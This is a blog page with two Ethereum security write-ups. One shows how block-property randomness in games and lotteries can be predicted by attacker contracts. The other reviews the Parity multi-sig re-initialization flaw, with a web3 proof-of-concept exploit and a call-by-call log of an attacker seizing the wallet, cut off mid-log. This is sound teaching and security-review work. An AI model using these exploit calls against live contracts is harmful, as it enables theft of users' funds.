Entries in ethereum (2)

Friday, June 1, 2018

Breaking Randomness in the Ethereum Universe [part 1]

It is widely acknowledged that generating secure random numbers on the Ethereum blockchain is difficult due to its deterministic nature. Each time a smart contract’s function is called inside a transaction, the call must be replayed and verified by the rest of the network. This is crucial so that a miner cannot manipulate the internal state during execution and modify the result for their own benefit. For example, if the Ethereum Virtual Machine (EVM) provided functionality to generate a random number using a cryptographically secure random source on the miner’s system, it would not be possible to confirm that the generated number had not been manipulated by the miner. A more important reason, however, is that this would not be deterministic: if ether is transferred or alternative code paths are taken based on the generated number, the contract’s ether balance and storage state may be inconsistent with the view of the rest of the network.

This post is the first in a three-part series in which we look at some of the techniques developers use to generate numbers that appear to be random in the deterministic Ethereum environment, and at how these random number generators can be exploited in practice to our advantage. This first post focuses on generating random numbers on-chain and the security implications of doing so. In the remaining two posts we will review two other commonly used techniques: oracles, and participatory schemes where numbers are provided by multiple participants.

Sources of Entropy in Ethereum

We have established that we cannot trust a single miner to generate a “high quality” random number for our smart contract, and that if a “random” number is produced, the same number must be produced when other nodes of the network execute the smart contract code for verification. One commonly used method is a Pseudorandom Number Generator (PRNG), which deterministically produces a series of bytes that look random, based on an initial private seed value and internal state.

The Ethereum blockchain provides a number of block properties that are not controllable by a single user of the network and are only somewhat controllable by miners, such as the timestamp and coinbase. Using these block properties as a source of entropy for the initial seed of a PRNG may well look sufficient, as the output appears random and the seed value cannot be directly manipulated by users of the smart contract.

The following block variables are commonly used when generating random numbers on-chain:

  • block.blockhash(uint blockNumber): hash of the given block (only works for 256 most recent blocks excluding current)

  • block.number: current block number

  • block.coinbase: current block miner’s address

  • block.timestamp: current block timestamp as seconds since unix epoch 

The main advantages of using block properties as a seed for randomness are that they are simple to implement and that the resulting random numbers are immediately available to the smart contract. This simplicity, speed and lack of dependence on external parties or systems make the use of block properties a desirable option. It is often assumed that when using block properties as a source of randomness, only miners would be in a position to cheat. For example, if the output number did not work in their favour, they could throw away the block and wait for a new block in which the generated number did work in their favour.

Based on the assumption that only miners are able to exploit number generation that uses block properties as a seed, there are multiple blog posts, Reddit posts, and Stack Overflow threads discussing when it is safe to use these properties for random number generation. These often incorrectly state that it is acceptable to use block properties only when the potential payout is less than the mining reward, as it would not be beneficial for a malicious miner to throw out the block. However, this is not the case, as we will see when we analyse and exploit the vulnerable smart contracts below.

Exploiting a Simple Number Guessing Smart-Contract

Firstly, we will look at a naïve, yet not uncommon, implementation using the block.blockhash function. The GuessingGame smart contract allows the participant to guess a randomly generated number. If the participant guesses correctly, they win twice their initial bet.

If we look at the badRandom function, we can see how the random number is generated by casting the blockhash of the previous block to an unsigned integer, then performing a modulus operation:

This will appear to provide a random value between 1 and 10 (unfortunately, this also introduces a modulo bias, meaning that some values are more likely than others). As the previous block’s hash is not controllable by an attacker, it cannot be manipulated to produce a random number in the attacker’s favour. However, the seed is known to the attacker. It is therefore possible to predict what the next winning number will be and beat the house. One potential problem with this approach is that the attacker needs to take the current block number, get the blockhash, generate the next number and make sure their bet is placed in the very next block.
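To make the predictability and the modulo bias concrete, here is a minimal JavaScript sketch. It assumes that badRandom computes uint(blockhash) % 10 + 1, which matches the description above but is not taken from the contract source; the hash value is an arbitrary illustrative constant, not a real block hash.

```javascript
// Hypothetical model of a badRandom-style function: uint(blockhash) % 10 + 1.
// The hash below is an arbitrary illustrative value, not a real block hash.
const previousBlockHash =
  "0x3f2a9c4d5e6b7a8190a1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3e4f5a6b";

function badRandom(blockHashHex) {
  // Interpret the 32-byte hash as an unsigned 256-bit integer.
  return (BigInt(blockHashHex) % 10n) + 1n;
}

// Anyone who can read the previous block hash computes the same "random" number.
const houseNumber = badRandom(previousBlockHash);
const attackerGuess = badRandom(previousBlockHash);

// Modulo bias: 2^256 is not a multiple of 10. The remainder is 6, so the
// residues 0..5 each have one more preimage than the residues 6..9.
const remainder = (2n ** 256n) % 10n;

console.log(houseNumber === attackerGuess, remainder);
```

The bias is tiny for a 256-bit input, so the practical problem here is not the bias but the fact that the seed is public.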

This isn’t very feasible to do manually. However, we can get around this by calculating the next winning number on-chain and then making an external contract call to the GuessingGame with the correct number. The following attacker contract will always predict the winning number when the cheat() function is called.
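The same-block trick can be modelled off-chain. The JavaScript sketch below is a simulation under stated assumptions, not the attacker contract itself: the GuessingGame and Attacker classes are hypothetical stand-ins, and mockBlockHash uses SHA-256 of the block number in place of real Ethereum block hashes (only determinism matters for the argument).

```javascript
const crypto = require("crypto");

// Stand-in for real block hashes: SHA-256 of the block number. Real Ethereum
// block hashes are Keccak-256 digests of block headers.
function mockBlockHash(blockNumber) {
  const digest = crypto.createHash("sha256").update(String(blockNumber)).digest("hex");
  return BigInt("0x" + digest);
}

// Hypothetical model of the game: the winning number depends only on the
// previous block's hash.
class GuessingGame {
  winningNumber(currentBlock) {
    return (mockBlockHash(currentBlock - 1) % 10n) + 1n;
  }
  guess(number, currentBlock) {
    return number === this.winningNumber(currentBlock);
  }
}

// Hypothetical attacker "contract": it runs in the same transaction, and
// therefore the same block, as the game call, so it sees the same hash.
class Attacker {
  constructor(game) {
    this.game = game;
  }
  cheat(currentBlock) {
    const predicted = (mockBlockHash(currentBlock - 1) % 10n) + 1n;
    return this.game.guess(predicted, currentBlock);
  }
}

const attacker = new Attacker(new GuessingGame());
const results = [];
for (let block = 100; block < 110; block++) {
  results.push(attacker.cheat(block));
}
console.log(results.every(Boolean));
```

Because the prediction and the guess are evaluated against the same block, the timing problem described above disappears.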

Another Vulnerable ‘Lottery’ Style Game

The above contract will allow us to always take away the winnings. But can we still exploit this type of random number generation when the generation takes place at some point in the future? To explore this, we have the following lottery-style smart contract where participants can buy a ticket in a draw. When enough tickets have been sold, a winner can be selected. A common, but problematic, coding pattern is shown below:

By looking at the buyTicket function below, there is nothing the attacker can control when buying a ticket, other than waiting for specific tickets to be sold and buying theirs at a specific point, such as waiting for 2 to be sold and then attempting to purchase the 3rd.

Let’s now look at how the winning ticket is chosen:

Firstly, there is a require statement to ensure that the winner can only be chosen once the required number of tickets have been sold. If this requirement is met, the sale is over and a random number is generated. In this case we have no control over what the winnerIndex will be. However, we can calculate who the winner will be before invoking the drawWinner() function, which allows the attacker to wait until a blockhash is used that generates a random number making the attacker the winner.

The problem with this approach is that the attacker needs to know which ticket they have, or at which index in the drawParticipants array their account address is located. Within the blockchain, even private variables are readable by everyone, even if the contract does not directly expose them. The web3.eth.getStorageAt(contractAddress, index) method can be used to look into the contract’s persistent storage and identify which ticket is the attacker’s.

The attacker contract below will take the desired winner index, then calculate whether that index is going to win the draw during the current block. If the desired winner is going to be selected, the drawWinner() function is called and the attacker takes home the contract balance. If the attacker is not going to win, the call returns before drawing the winner. The attacker just needs to repeatedly call the cheat(winnerIndex) function until the blockhash outputs a number that results in the correct winner. It is true that this process is going to cost the attacker transaction fees for each repeated call; however, this is likely to be negligible when compared to a game’s payout.
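The retry loop can be sketched as a small JavaScript simulation. It assumes the winner is chosen as uint(blockhash of the previous block) % number of participants, which is a guess at the pattern described and not the contract’s actual code; mockBlockHash, winnerIndexAt and cheat are hypothetical helpers, and SHA-256 of the block number stands in for real block hashes.

```javascript
const crypto = require("crypto");

// Stand-in for real block hashes (assumption: SHA-256 of the block number).
function mockBlockHash(blockNumber) {
  const digest = crypto.createHash("sha256").update(String(blockNumber)).digest("hex");
  return BigInt("0x" + digest);
}

// Assumed draw rule: winnerIndex = uint(blockhash(block.number - 1)) % participants.
function winnerIndexAt(currentBlock, participantCount) {
  return Number(mockBlockHash(currentBlock - 1) % BigInt(participantCount));
}

// cheat() only triggers the draw when the desired index would win in this block.
function cheat(desiredIndex, currentBlock, participantCount) {
  const index = winnerIndexAt(currentBlock, participantCount);
  if (index !== desiredIndex) {
    return null; // return early; the draw is left untouched
  }
  return index; // stands in for calling drawWinner()
}

const participantCount = 5;
const desiredIndex = 2;
let block = 1000;
let attempts = 0;
let winner = null;
while (winner === null && attempts < 10000) {
  attempts++;
  winner = cheat(desiredIndex, block, participantCount);
  block++;
}
console.log(`index ${winner} drawn after ${attempts} attempt(s)`);
```

With uniformly distributed hashes, the expected number of attempts is roughly the number of participants, which is why the fee cost grows with the size of the draw.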

The primary drawback with this approach is that if the drawWinner() function is called by another participant, the winner may be chosen at a block number which does not result in the attacker winning. Another issue is that, depending on the number of participants, the attacker may need to submit a large number of transactions before they are chosen.

A partial mitigation?

As games are typically designed to be played by real players, rather than other smart contracts, we could look to identify whether the player’s address is a regular Externally Owned Account (EOA) or a smart contract account. It appears this can currently be achieved by using inline assembly and the EXTCODESIZE opcode, which returns the size of the CODE property of an external Ethereum account using its address. For example, this could be implemented with the following:

This will restrict specific functions to being called only from Externally Owned Accounts and therefore mitigate the attacks outlined above. However, this does not mitigate attacks from malicious miners and will likely break for future accounts created under the Ethereum account abstraction proposed in EIP-86, which is scheduled for Constantinople (Metropolis stage 2).

The practice of generating pseudo-random numbers using block properties is highly discouraged. We have looked at how an attacker can actually exploit such PRNG implementations via external contract calls, which allow an attacker to predict the next number to be generated in the same block. Whilst a partial mitigation does exist to prevent the specific attacks mentioned, block properties and on-chain data are always public and therefore carry the risk that an attacker may be able to predict the winning number and use it to their advantage.

In the following two parts of this series, we will analyse random number generation using participatory schemes, where numbers are provided by multiple participants, and using external sources of randomness that are consumed via Oracles.


Wednesday, September 27, 2017

Reviewing Ethereum Smart Contracts

Ethereum has been in the news recently due to a string of security incidents affecting smart contracts running on the platform. As a security engineer, these stories piqued my interest and I began my own journey down the rabbit hole that is Ethereum “dapp” (decentralized application) development and security. I think it is a fascinating technology with some talented engineers pushing the boundaries of what is possible in an otherwise trustless network. The community has also begun to mature, as projects have started bug bounties, security best practices have been published, and vulnerabilities in the technology itself have been patched.

Still, if Ethereum’s popularity is to continue to grow, I believe that it is going to need the help of the wider security industry. And therein is a problem. Most security engineers still don’t know what Ethereum even is, let alone how to perform a security review of an application running on it.

As it turns out, there are some pretty big similarities between traditional code review and Ethereum smart contract review. This is because smart contracts are functionally just ABI (application binary interface) services. They are similar to the very API services that many security engineers are accustomed to reviewing, but use a binary protocol and set of conventions specific to Ethereum. Unsurprisingly, these details are also what make Ethereum smart contracts prone to several specific types of bugs, such as those relating to function reentrancy and underflows. These vulnerabilities are important to understand as well, although they are a bit more advanced and best suited for another blog post.

Let us take a look at a case study to examine the similarities between traditional code review and smart contract review.

A Case Study: The Parity “Multi-Sig” Vulnerability

On July 19, 2017, a popular Ethereum client named Parity was found to contain a critical vulnerability that led to the theft of $120MM. Parity allows users to set up wallets that can be managed by multiple parties, such that some threshold of authorized owners must sign a transaction before it is executed on the network. Because this is not a native feature built into the Ethereum protocol, Parity maintains its own open source Ethereum smart contract to implement this feature. When a user wants to create a multi-signature wallet, they actually deploy their own copy of the smart contract. As it turned out, Parity’s multi-signature smart contract contained a vulnerability that, when exploited, allowed unauthorized users to rob a wallet of all of its Ether (Ethereum’s native cryptocurrency).

Parity’s multi-signature wallet is based off of another open source smart contract that can be found here. Both are written in Solidity, which is a popular Ethereum programming language. Solidity looks and feels a lot like JavaScript, but allows developers to create what are functionally ABI services by making certain functions callable by other agents on the network. An important feature of the language is that ABI functions are publicly callable by default, unless they are marked as “private” or “internal”.

In December of 2016, a redesigned version of the multi-signature wallet contract was added to Parity’s GitHub repository with some considerable changes. The team decided to refactor the contract into a library. This meant that calls to individual multi-signature wallets would actually be forwarded to a single, hosted library contract. This implementation detail wouldn’t be obvious to a caller unless they examined the code or ran a debugger.

Unfortunately, it was during this refactor that a critical security vulnerability was introduced into the code base. When the contract code was transformed into a single contract (think class in object-oriented programming), all of the initializer functions lost the important property of initialization: only being callable once. It was therefore possible to re-call the contract’s initialization function even after it had already been deployed and initialized, and change the settings of the contract.

How can attacks like the one on Parity’s contract be avoided? As it turns out, the vulnerability would have likely been caught by a short code review.

Profiling Solidity Functions

As I mentioned, Ethereum smart contracts are functionally just ABI services. One of the first things we do as security engineers when reviewing an application is to map out which endpoints we have authorization (intentionally or unintentionally) to interact with.

We can easily do this for a Solidity application using a tool I wrote called the Solidity Function Profiler. Let’s run it on a vulnerable version of the multi-signature contract described earlier, looking for visible (public or external) functions that aren’t constants (possibly state changing) and don’t use any modifiers (which may be authorization checks). If we were looking for new vulnerabilities, we would obviously apply much more scrutiny to the output of the tool. For the sake of this blog post, simply looking for functions that fit the above criteria is adequate.

For those who want to follow along at home, a vulnerable version of the contract code can be found here. This is the code that we will be referencing throughout the rest of this blog post.

Four functions fit these criteria; they are marked with an asterisk (*) in the table below.

  Contract       Function                        Visibility  Constant  Returns    Modifiers
  WalletLibrary  ()                              public      false                payable
* WalletLibrary  initMultiowned(address,uint)    public      false
* WalletLibrary  revoke(bytes32)                 external    false
  WalletLibrary  changeOwner(address,address)    external    false                onlymanyowners
  WalletLibrary  addOwner(address)               external    false                onlymanyowners
  WalletLibrary  removeOwner(address)            external    false                onlymanyowners
  WalletLibrary  changeRequirement(uint)         external    false                onlymanyowners
  WalletLibrary  getOwner(uint)                  external    true      address
  WalletLibrary  isOwner(address)                public      true      bool
  WalletLibrary  hasConfirmed(bytes32,address)   external    true      bool
* WalletLibrary  initDaylimit(uint)              public      false
  WalletLibrary  setDailyLimit(uint)             external    false                onlymanyowners
  WalletLibrary  resetSpentToday()               external    false                onlymanyowners
* WalletLibrary  initWallet(address,uint,uint)   public      false
  WalletLibrary  kill(address)                   external    false                onlymanyowners
  WalletLibrary  execute(address,uint,bytes)     external    false     o_hash     onlyowner
  WalletLibrary  create(uint,bytes)              internal    false     o_addr
  WalletLibrary  confirm(bytes32)                public      false     o_success  onlymanyowners
  WalletLibrary  confirmAndCheck(bytes32)        internal    false     bool
  WalletLibrary  reorganizeOwners()              private     false
  WalletLibrary  underLimit(uint)                internal    false     bool       onlyowner
  WalletLibrary  today()                         private     true      uint
  WalletLibrary  clearPending()                  internal    false
  Wallet         Wallet(address,uint,uint)       public      false
  Wallet         ()                              public      false                payable
  Wallet         getOwner(uint)                  public      true      address
  Wallet         hasConfirmed(bytes32,address)   external    true      bool
  Wallet         isOwner(address)                public      true      bool
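The filtering step can be sketched in a few lines of JavaScript. This is not how the Solidity Function Profiler is implemented; it only applies the stated criteria to a handful of rows transcribed from the table. The object shape and the isInteresting helper are hypothetical, and excluding constructors (which cannot be re-called after deployment) is an assumption added here.

```javascript
// A few rows transcribed from the profiler table; the object shape is hypothetical.
const functions = [
  { contract: "WalletLibrary", name: "", visibility: "public", constant: false, modifiers: ["payable"] },
  { contract: "WalletLibrary", name: "initMultiowned", visibility: "public", constant: false, modifiers: [] },
  { contract: "WalletLibrary", name: "revoke", visibility: "external", constant: false, modifiers: [] },
  { contract: "WalletLibrary", name: "changeOwner", visibility: "external", constant: false, modifiers: ["onlymanyowners"] },
  { contract: "WalletLibrary", name: "isOwner", visibility: "public", constant: true, modifiers: [] },
  { contract: "WalletLibrary", name: "initDaylimit", visibility: "public", constant: false, modifiers: [] },
  { contract: "WalletLibrary", name: "initWallet", visibility: "public", constant: false, modifiers: [] },
  { contract: "WalletLibrary", name: "execute", visibility: "external", constant: false, modifiers: ["onlyowner"] },
  { contract: "WalletLibrary", name: "create", visibility: "internal", constant: false, modifiers: [] },
  { contract: "Wallet", name: "Wallet", visibility: "public", constant: false, modifiers: [] },
];

// Visible, possibly state changing, and not protected by any modifier.
function isInteresting(fn) {
  const visible = fn.visibility === "public" || fn.visibility === "external";
  // Assumption: a function named after its contract is a constructor and
  // cannot be called again after deployment, so it is skipped.
  const isConstructor = fn.name === fn.contract;
  return visible && !fn.constant && fn.modifiers.length === 0 && !isConstructor;
}

const candidates = functions.filter(isInteresting).map((fn) => fn.name);
console.log(candidates);
```

A filter like this only produces a shortlist; each candidate still needs a manual read, since a function may perform its authorization check in its body rather than through a modifier.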

Call Delegation

All four identified functions are found in the contract’s library, meaning that we may not be able to reach them because the main Wallet contract doesn’t expose them. However, a quick read of the source code reveals the use of a call forwarding pattern that delegates calls made to the Wallet contract to the WalletLibrary contract. This is done via a fallback function, which is a special function that gets called when no matching function is found during a call or when Ether is sent to a contract. With this information we know that these functions can be called.

contract Wallet is WalletEvents {
[..snip..]
  // gets called when no other function matches
  function() payable {
    // just being sent some cash?
    if (msg.value > 0)
      Deposit(msg.sender, msg.value);
    else if (msg.data.length > 0)
      _walletLibrary.delegatecall(msg.data);
  }

This call delegation pattern is typically discouraged due to the security implications it can pose when calling external, untrusted contracts. In this case the delegatecall function is used to proxy calls to what would be a trusted library contract, so while it is a bad practice it isn’t an active issue here. If the contract’s developers had been more explicit about which calls were allowed to be delegated by this function, the vulnerability might never have existed. However, the delegation itself is not the direct cause of the vulnerability, and the delegation pattern continues to exist even in the patched version of this contract.
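To illustrate why the library’s functions are reachable through the Wallet, here is a rough JavaScript model of the fallback-plus-delegatecall pattern. It is a simplification under stated assumptions: the Wallet class, the walletLibrary object and the name-based dispatch are hypothetical, and the real fallback additionally checks msg.value and msg.data.length before delegating.

```javascript
// Hypothetical library: its functions operate on whatever storage object they
// are handed, mirroring how delegatecall runs library code in the caller's context.
const walletLibrary = {
  initWallet(storage, sender, owners, required) {
    storage.owners = [sender, ...owners];
    storage.required = required;
  },
};

class Wallet {
  constructor(library) {
    this.library = library;
    this.storage = { owners: [], required: 0 };
    // Functions the Wallet contract itself declares.
    this.ownFunctions = {
      isOwner: (sender, address) => this.storage.owners.includes(address),
    };
  }

  // Dispatch a call by name; unknown names fall through to the fallback.
  call(sender, fn, ...args) {
    if (Object.prototype.hasOwnProperty.call(this.ownFunctions, fn)) {
      return this.ownFunctions[fn](sender, ...args);
    }
    return this.fallback(sender, fn, args);
  }

  // Fallback: forward the call to the library, which writes to this.storage.
  fallback(sender, fn, args) {
    if (Object.prototype.hasOwnProperty.call(this.library, fn)) {
      return this.library[fn](this.storage, sender, ...args);
    }
    return undefined;
  }
}

const wallet = new Wallet(walletLibrary);
wallet.call("0xowner", "initWallet", ["0xsecond"], 2);
const ownerBefore = wallet.call("0xattacker", "isOwner", "0xattacker");
wallet.call("0xattacker", "initWallet", [], 1); // not declared on Wallet, yet reachable
const ownerAfter = wallet.call("0xattacker", "isOwner", "0xattacker");
console.log(ownerBefore, ownerAfter);
```

The Wallet never declares initWallet, yet the call lands in the library and modifies the wallet’s own state, which is the behaviour the fallback function above provides on-chain.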

The Vulnerability: Wallet Reinitialization

If we look at the source code associated with the four functions listed above, we discover that the revoke function performs an authorization check. However, the remaining three functions don’t perform such a check and seem like they might be quite interesting. For example, the initMultiowned function sets the contract’s list of owners and the number of signatures required to perform transactions:

  // constructor is given number of sigs required to do protected "onlymanyowners" transactions
  // as well as the selection of addresses capable of confirming them.
  function initMultiowned(address[] _owners, uint _required) {
    m_numOwners = _owners.length + 1;
    m_owners[1] = uint(msg.sender);
    m_ownerIndex[uint(msg.sender)] = 1;
    for (uint i = 0; i < _owners.length; ++i)
    {
      m_owners[2 + i] = uint(_owners[i]);
      m_ownerIndex[uint(_owners[i])] = 2 + i;
    }
    m_required = _required;
  }

The initDaylimit function changes the daily limit on the amount of Ether that is allowed to be transacted:

  // constructor - stores initial daily limit and records the present day's index.
  function initDaylimit(uint _limit) {
    m_dailyLimit = _limit;
    m_lastDay = today();
  }

The initWallet function simply calls the two functions described above, passing them the function’s own arguments as wallet settings:

  // constructor - just pass on the owner array to the multiowned and
  // the limit to daylimit
  function initWallet(address[] _owners, uint _required, uint _daylimit) {
    initDaylimit(_daylimit);
    initMultiowned(_owners, _required);
  }

All of this makes sense so far, as these functions are used to initialize the state of a new wallet. However, what are these functions used for once the wallet is initialized? What would stop them from simply being re-called and overwriting the wallet’s settings?

The answer to both questions is nothing. These functions are intended to only be called once by the original owner, but there isn’t anything enforcing this. There are no authorization checks, no visibility specifiers to make the functions internal, and not a single check to make sure that the wallet hasn’t been initialized already.

This is the root cause of the vulnerability. These functions are public and state changing, and we’ve discovered this using the Solidity Function Profiler and a bit of manual code review.
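One way to picture the missing check is a one-time initialization guard. The JavaScript model below is a hypothetical sketch, not the patch that was actually shipped: the GuardedWallet class and its field names are illustrative, and the guard simply refuses to run once any owner has been recorded.

```javascript
// JavaScript model of the wallet's owner state with a hypothetical
// one-time initialization guard (absent from the vulnerable contract).
class GuardedWallet {
  constructor() {
    this.numOwners = 0;
    this.owners = new Map(); // slot index -> address, mirroring m_owners
    this.required = 0;
    this.dailyLimit = 0;
  }

  initWallet(sender, owners, required, dailyLimit) {
    // The guard: initialization is only allowed while no owners exist.
    if (this.numOwners > 0) {
      throw new Error("wallet already initialized");
    }
    this.dailyLimit = dailyLimit;
    this.numOwners = owners.length + 1;
    this.owners.set(1, sender);
    owners.forEach((owner, i) => this.owners.set(2 + i, owner));
    this.required = required;
  }
}

const guarded = new GuardedWallet();
guarded.initWallet("0xowner", ["0xsecond"], 2, 3);

let rejected = false;
try {
  guarded.initWallet("0xattacker", ["0xattacker"], 1, 0);
} catch (err) {
  rejected = true; // the second initialization attempt is refused
}
console.log(rejected, guarded.owners.get(1));
```

Making the initializers internal, or adding an authorization modifier, would be alternative ways to close the same hole.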

Proof of Concept Reproduction

The attacker’s exploit code may have looked something like this (using the Web3 JavaScript API):

// "Reinitialize" the wallet by calling initWallet
web3.eth.sendTransaction({from: attacker, to: victim, data: "0xe46dcfeb0000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000" + attacker.slice(2,42)}); 

// Send 100 ETH to the attacker by calling execute 
web3.eth.sendTransaction({from: attacker, to: victim, data: "0xb61d27f6000000000000000000000000" + attacker.slice(2,42) + "0000000000000000000000000000000000000000000000056bc75e2d6310000000000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000"})
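The structure of that call data can be reproduced by hand. The sketch below builds both payloads from 32-byte ABI words using plain JavaScript; the two function selectors are copied from the call data above, while the helper names (word, uintWord, encodeInitWallet, encodeExecute) are hypothetical and the attacker address is the one used in the walkthrough that follows.

```javascript
// Function selectors as they appear in the call data above.
const INIT_WALLET_SELECTOR = "e46dcfeb"; // initWallet(address[],uint256,uint256)
const EXECUTE_SELECTOR = "b61d27f6"; // execute(address,uint256,bytes)

// Left-pad a hex string (without 0x) to one 32-byte ABI word.
function word(hex) {
  return hex.padStart(64, "0");
}

// Encode an unsigned integer as one ABI word.
function uintWord(value) {
  return word(BigInt(value).toString(16));
}

// Head: offset of the owners array (3 words = 0x60), _required, _daylimit.
// Tail: array length followed by one word per owner address.
function encodeInitWallet(owners, required, dayLimit) {
  const head = uintWord(0x60) + uintWord(required) + uintWord(dayLimit);
  const tail =
    uintWord(owners.length) +
    owners.map((owner) => word(owner.slice(2).toLowerCase())).join("");
  return "0x" + INIT_WALLET_SELECTOR + head + tail;
}

// execute(_to, _value, _data) with empty _data: the bytes offset is 0x60 and
// the bytes length is 0.
function encodeExecute(to, valueWei) {
  return (
    "0x" + EXECUTE_SELECTOR +
    word(to.slice(2).toLowerCase()) +
    uintWord(valueWei) +
    uintWord(0x60) +
    uintWord(0)
  );
}

const attackerAddress = "0xca35b7d915458ef540ade6068dfe2f44e8fa733c";
const initData = encodeInitWallet([attackerAddress], 1, 0);
const executeData = encodeExecute(attackerAddress, 100n * 10n ** 18n);
console.log(initData);
console.log(executeData);
```

Read this way, the first transaction sets a single extra owner with one required signature and a daily limit of zero, and the second asks the wallet to send 100 Ether (0x56bc75e2d63100000 Wei) to the attacker.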

It can be a little difficult to parse out what’s going on with raw call data. Let’s break this down a bit further using a more in-depth example reproduction. Consider the following actors with the corresponding addresses:

  •  Multi-Sig Wallet Contract: 0xde6a66562c299052b1cfd24abc1dc639d429e1d6
  •  Original Owner Account: 0x14723a09acff6d2a60dcdf7aa4aff308fddc160c
  •  Second Owner Account: 0x4b0897b0513fdc7c541b6d9d7e929c4e5364d2db
  •  Attacker Account: 0xca35b7d915458ef540ade6068dfe2f44e8fa733c

The initialization of a multi-signature wallet would look something like this, where the first argument is an array of additional owner addresses, the second is the number of signatures required, and the third is a daily limit:

From:   Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To:     Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:   initWallet(["0x4b0897b0513fdc7c541b6d9d7e929c4e5364d2db"], 2, 3)
Result: 0x
Events: none

We can see that there are now two owners, one being the original owner and the other being the second owner:

From:   Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To:     Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:   m_numOwners
Result: 2
Events: none

From:   Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To:     Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:   getOwner(0)
Result: 0x14723a09acff6d2a60dcdf7aa4aff308fddc160c
Events: none

From:   Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To:     Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:   getOwner(1)
Result: 0x4b0897b0513fdc7c541b6d9d7e929c4e5364d2db
Events: none

The original owner and the second owner would then deposit funds into the wallet by sending the contract Ether (which would actually call the fallback function, which gets called when Ether is sent).

We can confirm that attempting to make a privileged call (any function using the onlymanyowners modifier) as an owner does generate a confirmation event. For example, attempting to execute a transaction above the daily limit (expressed in Wei in the call, rather than Ether) generates a Confirmation event as well as a ConfirmationNeeded event. This is expected since an additional signature is required:

From:   Original Owner (0x14723a09acff6d2a60dcdf7aa4aff308fddc160c)
To:     Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:   execute("0xdd870fa1b7c4700f2bd7f44238821c26f7392148", "1000000000000000000", [])
Result: 0x9bf4e669ac38b35d36c7b4574788577b908799d493ef63f40037afd6933c7be1
Events: Confirmation[
  "0x14723a09acff6d2a60dcdf7aa4aff308fddc160c",
  "0x9bf4e669ac38b35d36c7b4574788577b908799d493ef63f40037afd6933c7be1"
]
ConfirmationNeeded[
  "0x9bf4e669ac38b35d36c7b4574788577b908799d493ef63f40037afd6933c7be1",
  "0x14723a09acff6d2a60dcdf7aa4aff308fddc160c",
  "4",
  "0x0",
  "0x"
]

We can also confirm that attempting to make a multi-signature call as the attacker results in no execution or event generation, as the attacker’s address isn’t in the map of owner addresses. The call fails immediately:

From:   Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To:     Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:   execute("0xca35b7d915458ef540ade6068dfe2f44e8fa733c", "1000000000000000000", [])
Result: 0x0000000000000000000000000000000000000000000000000000000000000000
Events: none

Now that we have a baseline for expected contract behavior, let’s break it by simply “reinitializing” the contract as the attacker. We give the function an array of owner addresses containing just the attacker’s address. This actually sets two owner addresses (both being the attacker’s), since the contract uses the sender’s address as well as the list of supplied owner addresses. This is an important detail for an attacker to consider, because the initWallet function doesn’t ensure that all previous owners are removed (and therefore locked out of the wallet). The side effect of calling the initWallet function again that is being exploited here is that it overwrites the first N + 1 entries of the owner address map, where N is the length of our supplied list of owner addresses and the extra entry is the sender’s own address:
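The overwrite behaviour is easy to see in a direct JavaScript transcription of the initMultiowned logic shown earlier. The sketch is illustrative only: a Map stands in for the m_owners storage mapping, the m_ownerIndex bookkeeping is omitted, and the three-owner wallet and short address strings are hypothetical.

```javascript
// JavaScript transcription of the initMultiowned logic; the Map stands in
// for the m_owners storage mapping (m_ownerIndex is omitted for brevity).
function initMultiowned(state, sender, owners, required) {
  state.numOwners = owners.length + 1;
  state.owners.set(1, sender);
  owners.forEach((owner, i) => state.owners.set(2 + i, owner));
  state.required = required;
}

const state = { numOwners: 0, owners: new Map(), required: 0 };

// Hypothetical wallet with three owners: the sender plus two more.
initMultiowned(state, "0xowner1", ["0xowner2", "0xowner3"], 2);

// The attacker re-initializes with a single-element list, so only slots 1
// and 2 are overwritten.
initMultiowned(state, "0xattacker", ["0xattacker"], 1);

console.log(state.numOwners); // 2
console.log(state.owners.get(1)); // 0xattacker
console.log(state.owners.get(2)); // 0xattacker
console.log(state.owners.get(3)); // 0xowner3 (stale entry, never cleared)
```

In this model the stale third slot is left behind, which is why an attacker who wants to displace every previous owner has to pay attention to how many addresses they supply.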

From:   Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To:     Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:   initWallet(["0xca35b7d915458ef540ade6068dfe2f44e8fa733c"], 1, 0)
Result: 0x
Events: none

Querying the contract again for the first owner, we now get:

From:   Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To:     Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:   getOwner(0)
Result: 0xca35b7d915458ef540ade6068dfe2f44e8fa733c
Events: none

From:   Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To:     Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:   getOwner(1)
Result: 0xca35b7d915458ef540ade6068dfe2f44e8fa733c
Events: none

We can also see that the number of required signatures has been successfully changed. The daily limit is irrelevant in this case because the contract ignores it if only 1 signature is required.

From:   Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
To:     Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:   m_required
Result: 1
Events: none

At this point it is trivial for the attacker to steal all of the funds in the wallet. The attacker is an owner and only one signature is required. The returned 0 indicates that there is no associated ConfirmationNeeded data, and that the contract has paid out:

From:   Attacker (0xca35b7d915458ef540ade6068dfe2f44e8fa733c)
